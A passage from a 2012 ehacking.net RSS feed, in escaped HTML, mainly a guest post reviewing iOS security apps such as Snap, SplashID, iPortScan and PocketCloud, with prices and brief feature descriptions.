&lt;/b&gt;&lt;/span&gt;&lt;span style="color: black; font-size: small;"&gt;&lt;span style="text-decoration: none;"&gt;&lt;i&gt;&lt;b&gt;&lt;span style="background: none repeat scroll 0% 0% transparent;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: black; font-size: small;"&gt;&lt;span style="text-decoration: none;"&gt;&lt;u style="color: blue;"&gt;&lt;b&gt;&lt;span style="background: none repeat scroll 0% 0% transparent;"&gt;About the Author&lt;/span&gt;&lt;/b&gt;&lt;/u&gt;&lt;i&gt;&lt;b&gt;&lt;span style="background: none repeat scroll 0% 0% transparent;"&gt; &lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: black; font-size: small;"&gt;&lt;span style="text-decoration: none;"&gt;&lt;i&gt;&lt;b&gt;&lt;span style="background: none repeat scroll 0% 0% transparent;"&gt;This is a guest article by Ruben Corbo, a writer for the website&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;a href="http://www.blogger.com/goog_389801799"&gt;&lt;span style="color: #ea9999; font-size: small;"&gt;&lt;/span&gt;&lt;/a&gt;&lt;span style="color: #ea9999; font-size: small;"&gt;&lt;a href="" target="_blank"&gt;&lt;i&gt;&lt;b&gt;&lt;span style="background: none repeat scroll 0% 0% transparent;"&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;/a&gt;&lt;/span&gt;&lt;span style="color: black; font-size: small;"&gt;&lt;span style="text-decoration: none;"&gt;&lt;b&gt;&lt;span style="background: none repeat scroll 0% 0% transparent;"&gt;&lt;a href="http://www.broadbandexpert.com/" target="_blank"&gt; &lt;i style="color: blue;"&gt;Broadband expert&lt;/i&gt;&lt;/a&gt; &lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="color: black; font-size: small;"&gt;&lt;span style="text-decoration: none;"&gt;&lt;i&gt;&lt;b&gt;&lt;span style="background: none repeat scroll 0% 0% transparent;"&gt;where you can find internet service providers in your area and compare prices on different deals for your mobile broadband needs.&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;br /&gt;
&lt;/span&gt; &lt;br /&gt;
&lt;br /&gt;
&lt;div style="font-family: inherit;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div dir="ltr" style="font-family: inherit; text-align: left;" trbidi="on"&gt;   &lt;br /&gt;
&lt;div&gt;&lt;script src="http://connect.facebook.net/en_US/all.js#xfbml=1"&gt;
&lt;/script&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;fb:like href="http://www.ehacking.net/" show_faces="true" width="450"&gt;&lt;/fb:like&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="color: red;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;Note: If you want to learn more about Linux and Windows based Penetration testing, you might want to subscribe our &lt;a href="http://feeds.feedburner.com/ehacking"&gt;RSS feed&lt;/a&gt; and &lt;a href="http://feedburner.google.com/fb/a/mailverify?uri=ehacking&amp;amp;loc=en_US"&gt;Email Subscription&lt;/a&gt;&amp;nbsp; or become our &lt;a href="http://www.facebook.com/Beautyofthebaud"&gt;Facebook fan&lt;/a&gt;! You will get all the latest updates at both the places.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3964176871415674890-3860309880510777934?l=www.ehacking.net' alt='' /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=2M4bqDaIF8I:sdQ2nBTj94I:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=2M4bqDaIF8I:sdQ2nBTj94I:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?i=2M4bqDaIF8I:sdQ2nBTj94I:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=2M4bqDaIF8I:sdQ2nBTj94I:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=2M4bqDaIF8I:sdQ2nBTj94I:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?i=2M4bqDaIF8I:sdQ2nBTj94I:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=2M4bqDaIF8I:sdQ2nBTj94I:F7zBnMyn0Lo"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?i=2M4bqDaIF8I:sdQ2nBTj94I:F7zBnMyn0Lo" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=2M4bqDaIF8I:sdQ2nBTj94I:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?i=2M4bqDaIF8I:sdQ2nBTj94I:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=2M4bqDaIF8I:sdQ2nBTj94I:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=2M4bqDaIF8I:sdQ2nBTj94I:TzevzKxY174"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=TzevzKxY174" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=2M4bqDaIF8I:sdQ2nBTj94I:7Q72WNTAKBA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=7Q72WNTAKBA" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/ehacking/~4/2M4bqDaIF8I" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/ehacking/~3/2M4bqDaIF8I/protecting-your-wifi-connections-isps.html</link><author>noreply@blogger.com (Irfan Shakeel)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-k1pTzVncDY8/TzvTDWmsuLI/AAAAAAAABBA/-WGQ9qzGGuE/s72-c/2353464142_3ac72427ce.jpg" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.ehacking.net/2012/02/protecting-your-wifi-connections-isps.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3964176871415674890.post-1174103944248135483</guid><pubDate>Fri, 10 Feb 2012 18:17:00 +0000</pubDate><atom:updated>2012-02-10T10:18:03.663-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Review</category><category domain="http://www.blogger.com/atom/ns#">IOS (Apple)</category><category domain="http://www.blogger.com/atom/ns#">EH Tips</category><category domain="http://www.blogger.com/atom/ns#">Guest Post</category><category domain="http://www.blogger.com/atom/ns#">Random</category><title>Top Security Apps for iOS</title><description>&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/ox5ab6yPgcaHA_joALYBXgxcVic/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/ox5ab6yPgcaHA_joALYBXgxcVic/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/ox5ab6yPgcaHA_joALYBXgxcVic/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/ox5ab6yPgcaHA_joALYBXgxcVic/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div style="font-family: inherit;"&gt;&lt;style type="text/css"&gt;
 &lt;!--
  @page { margin: 0.79in }
  P { margin-bottom: 0.08in }
 --&gt;
 
&lt;/style&gt;   &lt;/div&gt;&lt;div class="separator" style="clear: both; font-family: inherit; text-align: center;"&gt;&lt;a href="http://www.ehacking.net/2012/02/top-security-apps-for-ios.html" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;" target="_blank"&gt;&lt;img border="0" height="180" src="http://4.bp.blogspot.com/-Q0455mO-xSc/TzLAqTfmSCI/AAAAAAAABAw/dLE4gZfLpA4/s200/charlie-miller-discusses-ios-security-and-macbook-battery-hacking-with-toms-hardware_-rayu_0.jpg" width="220" /&gt;&lt;/a&gt;&lt;span style="font-size: small;"&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;Apps can be built for every purpose. They can be simple games, or they can add new features to your phone or tablet. One of the coolest functions that apps can provide is security. Through a combination of iOS and a &lt;a href="http://www.broadband-expert.co.uk/mobile-broadband/" style="color: blue;" target="_blank"&gt;mobile broadband&lt;/a&gt; connection, home security from anywhere is as simple as launching an app. I've sorted through a number of the apps on the iTunes App Store in search of the best mobile and home security apps for iOS.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
&lt;div style="color: blue; font-family: inherit; margin-bottom: 0in; text-align: center;"&gt;&lt;style type="text/css"&gt;
 &lt;!--
  @page { margin: 0.79in }
  P { margin-bottom: 0.08in }
  H3 { margin-bottom: 0.08in }
  H3.western { font-family: "Arial", sans-serif }
 --&gt;
 
&lt;/style&gt;  &lt;br /&gt;
&lt;h3 align="CENTER" class="western"&gt;&lt;span style="color: blue;"&gt;&lt;u&gt;Snap&lt;/u&gt;&lt;/span&gt;&lt;/h3&gt;&lt;/div&gt;&lt;div style="font-family: inherit; margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;Ever worry about having unwanted guests on your wireless network? Then Snap is an app for you. Just launch Snap, and it scans the network you're on to find what machines are connected to it. The results it returns include information about the manufacturer of the device it found, as well as what type of device it is and any other pertinent information. Snap is perfect for finding rogue users on your own network, as well as finding out who else is using a public network. Snap is available for $1.99 on the App Store.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit; margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit; margin-bottom: 0in;"&gt;&lt;style type="text/css"&gt;
 &lt;!--
  @page { margin: 0.79in }
  P { margin-bottom: 0.08in }
  H3 { margin-bottom: 0.08in }
  H3.western { font-family: "Arial", sans-serif }
 --&gt;
 
&lt;/style&gt;  &lt;br /&gt;
&lt;h3 align="CENTER" class="western"&gt;&lt;span style="color: blue;"&gt;&lt;u&gt;SplashID&lt;/u&gt;&lt;/span&gt;&lt;/h3&gt;&lt;/div&gt;&lt;div style="font-family: inherit; margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;SplashID bills itself as a safe for the iPhone. The tool uses 256-bit encryption to store vital information such as passwords, but also lets you store even more critical information. Things such as credit card numbers, prescription numbers and more can be stored with SplashID. Other features of the app include anti-phishing icons to take you to the correct website every time, and a tab showing you your most frequently accessed records. The app costs a rather stiff $9.99, but for the added security it's worth it.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit; margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit; margin-bottom: 0in;"&gt;&lt;style type="text/css"&gt;
 &lt;!--
  @page { margin: 0.79in }
  P { margin-bottom: 0.08in }
  H3 { margin-bottom: 0.08in }
  H3.western { font-family: "Arial", sans-serif }
 --&gt;
 
&lt;/style&gt;  &lt;br /&gt;
&lt;h3 align="CENTER" class="western"&gt;&lt;span style="color: blue;"&gt;&lt;u&gt;Viewer for Axis Cams&lt;/u&gt;&lt;/span&gt;&lt;/h3&gt;&lt;/div&gt;&lt;div style="font-family: inherit; margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;Viewer for Axis Cams gives users true home security no matter where they are. This app requires you to own at least one Axis surveillance camera. It can be configured to one camera, and it supports up to a hundred in case you have multiple cameras. The tool allows you to edit the settings on a camera, and also provides notifications in case a camera goes out. Available for $4.99 in the App Store, Viewer for Axis Cams is a necessity for owners of Axis cameras.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit; margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit; margin-bottom: 0in;"&gt;&lt;style type="text/css"&gt;
 &lt;!--
  @page { margin: 0.79in }
  P { margin-bottom: 0.08in }
  H3 { margin-bottom: 0.08in }
  H3.western { font-family: "Arial", sans-serif }
 --&gt;
 
&lt;/style&gt;  &lt;br /&gt;
&lt;h3 align="CENTER" class="western"&gt;&lt;span style="color: blue;"&gt;&lt;u&gt;iPortScan&lt;/u&gt;&lt;/span&gt;&lt;/h3&gt;&lt;h3 align="CENTER" class="western"&gt;&lt;br /&gt;
&lt;/h3&gt;&lt;/div&gt;&lt;div style="font-family: inherit; margin-bottom: 0in;"&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-T8T79ytnpgA/TzVcvk7b9OI/AAAAAAAABA4/1Nv2Yap4ft4/s1600/Iportscan.jpg" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" height="200" src="http://3.bp.blogspot.com/-T8T79ytnpgA/TzVcvk7b9OI/AAAAAAAABA4/1Nv2Yap4ft4/s200/Iportscan.jpg" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;iPortScan lets you administrators check a known system to see what services are listening in. Essentially, it's a fast port scan that can be done from any mobile broadband connection. With the results of the port scan, administrators can be sure that nothing on the system is open unless it should be. As a $1.99 download from the App Store, its makers claim that it's a necessity for any security professional. With the features it provides at this price, it's hard to disagree.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit; margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit; margin-bottom: 0in;"&gt;&lt;style type="text/css"&gt;
 &lt;!--
  @page { margin: 0.79in }
  P { margin-bottom: 0.08in }
  H3 { margin-bottom: 0.08in }
  H3.western { font-family: "Arial", sans-serif }
 --&gt;
 
&lt;/style&gt;  &lt;br /&gt;
&lt;h3 align="CENTER" class="western"&gt;&lt;span style="color: blue;"&gt;&lt;u&gt;Wyse PocketCloud&lt;/u&gt;&lt;/span&gt;&lt;/h3&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="font-family: inherit; margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;PocketCloud provides security in a number of ways. The app is used to remotely access a Windows or Mac desktop from any iOS device. This lets security administrators access network tools that are on their computer that aren't available on iOS. Even from a consumer perspective, PocketCloud gives users the ability to remotely access their computer to access any files on it, and it does this with &lt;a href="http://www.ehacking.net/search/label/SSL" style="color: blue;" target="_blank"&gt;SSL&lt;/a&gt; support for maximum security. You'll be able to make sure no one is accessing your computer that shouldn't be, and perform any security related functions from your computer as well. At $14.99, it's not for everyone, but those who buy it will certainly appreciate it.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit; margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit; margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;Because the functions of these apps vary so greatly, one of them is bound to suit your needs. Give a couple of them a try and see how you like it. You just might turn your iOS device into a mobile security system.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit; margin-bottom: 0in;"&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;u&gt;&lt;b&gt;Author&lt;/b&gt;&lt;/u&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit; margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;Tech writer EJ Parfitt has been writing for a short time now and has already picked up steam with several tech websites and local news sites . During his free time , you're sure to catch him competing in local chess tournaments in downtown Fort Lauderdale FL .&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div dir="ltr" style="font-family: inherit; text-align: left;" trbidi="on"&gt;&lt;span class="st_twitter_large" displaytext="Tweet" style="font-size: small;"&gt;&lt;/span&gt;&lt;span class="st_facebook_large" displaytext="Facebook" style="font-size: small;"&gt;&lt;/span&gt;&lt;span class="st_ybuzz_large" displaytext="Yahoo! Buzz" style="font-size: small;"&gt;&lt;/span&gt;&lt;span class="st_gbuzz_large" displaytext="Google Buzz" style="font-size: small;"&gt;&lt;/span&gt;&lt;span class="st_email_large" displaytext="Email" style="font-size: small;"&gt;&lt;/span&gt;&lt;span class="st_sharethis_large" displaytext="ShareThis" style="font-size: small;"&gt;&lt;/span&gt;   &lt;br /&gt;
&lt;div&gt;&lt;script src="http://connect.facebook.net/en_US/all.js#xfbml=1"&gt;
&lt;/script&gt;&lt;span style="font-size: small;"&gt;&lt;fb:like href="http://www.ehacking.net/" show_faces="true" width="450"&gt;&lt;/fb:like&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="color: red;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;Note: If you want to learn more about Linux and Windows based Penetration testing, you might want to subscribe our &lt;a href="http://feeds.feedburner.com/ehacking"&gt;&lt;b&gt;RSS feed&lt;/b&gt;&lt;/a&gt; and &lt;a href="http://feedburner.google.com/fb/a/mailverify?uri=ehacking&amp;amp;loc=en_US"&gt;Email Subscription&lt;/a&gt;&amp;nbsp; or become our &lt;a href="http://www.facebook.com/Beautyofthebaud"&gt;&lt;b&gt;Facebook fan&lt;/b&gt;&lt;/a&gt;! You will get all the latest updates at both the places.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3964176871415674890-1174103944248135483?l=www.ehacking.net' alt='' /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=BZm33Cs71j4:xieyJojfEfc:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=BZm33Cs71j4:xieyJojfEfc:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?i=BZm33Cs71j4:xieyJojfEfc:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=BZm33Cs71j4:xieyJojfEfc:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=BZm33Cs71j4:xieyJojfEfc:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?i=BZm33Cs71j4:xieyJojfEfc:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=BZm33Cs71j4:xieyJojfEfc:F7zBnMyn0Lo"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?i=BZm33Cs71j4:xieyJojfEfc:F7zBnMyn0Lo" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=BZm33Cs71j4:xieyJojfEfc:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?i=BZm33Cs71j4:xieyJojfEfc:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=BZm33Cs71j4:xieyJojfEfc:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=BZm33Cs71j4:xieyJojfEfc:TzevzKxY174"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=TzevzKxY174" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=BZm33Cs71j4:xieyJojfEfc:7Q72WNTAKBA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=7Q72WNTAKBA" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/ehacking/~4/BZm33Cs71j4" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/ehacking/~3/BZm33Cs71j4/top-security-apps-for-ios.html</link><author>noreply@blogger.com (Irfan Shakeel)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/-Q0455mO-xSc/TzLAqTfmSCI/AAAAAAAABAw/dLE4gZfLpA4/s72-c/charlie-miller-discusses-ios-security-and-macbook-battery-hacking-with-toms-hardware_-rayu_0.jpg" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.ehacking.net/2012/02/top-security-apps-for-ios.html</feedburner:origLink></item></channel></rss>

